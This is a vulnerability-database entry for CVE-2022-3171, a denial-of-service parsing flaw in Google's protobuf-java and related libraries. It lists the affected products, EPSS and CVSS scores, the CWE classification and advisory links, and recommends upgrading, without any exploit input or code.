Vulnerability Details : CVE-2022-3171
A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.
Vulnerability category: Input validationDenial of service
Products affected by CVE-2022-3171
- cpe:2.3:a:google:google-protobuf:*:*:*:*:*:ruby:*:*
- cpe:2.3:a:google:google-protobuf:*:*:*:*:*:ruby:*:*
- cpe:2.3:a:google:google-protobuf:*:*:*:*:*:ruby:*:*
- cpe:2.3:a:google:google-protobuf:*:*:*:*:*:ruby:*:*
- cpe:2.3:a:google:protobuf-java:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-java:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-java:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-java:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin-lite:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin-lite:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin-lite:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-kotlin-lite:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-javalite:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-javalite:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-javalite:*:*:*:*:*:*:*:*
- cpe:2.3:a:google:protobuf-javalite:*:*:*:*:*:*:*:*
- cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2022-3171
0.07%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 23 %
Percentile, the proportion of vulnerabilities that are scored at or less
CVSS scores for CVE-2022-3171
| Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
|---|---|---|---|---|---|---|
|
4.3
|
MEDIUM | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
2.8
|
1.4
|
Google Inc. | |
|
7.5
|
HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
3.9
|
3.6
|
NIST | |
|
6.5
|
MEDIUM | AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
N/A
|
N/A
|
Oracle:CPUOct2023 |
CWE ids for CVE-2022-3171
-
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.Assigned by: cve-coordination@google.com (Secondary)
References for CVE-2022-3171
-
https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2
A potential Denial of Service issue in protobuf-java · Advisory · protocolbuffers/protobuf · GitHubThird Party Advisory
-
https://security.gentoo.org/glsa/202301-09
protobuf-java: Denial of Service (GLSA 202301-09) — Gentoo securityThird Party Advisory
-
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBAUKJQL6O4TIWYBENORSY5P43TVB4M3/
[SECURITY] Fedora 37 Update: protobuf-3.19.6-1.fc37 - package-announce - Fedora Mailing-ListsMailing List;Third Party Advisory
-
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MPCGUT3T5L6C3IDWUPSUO22QDCGQKTOP/
Jump to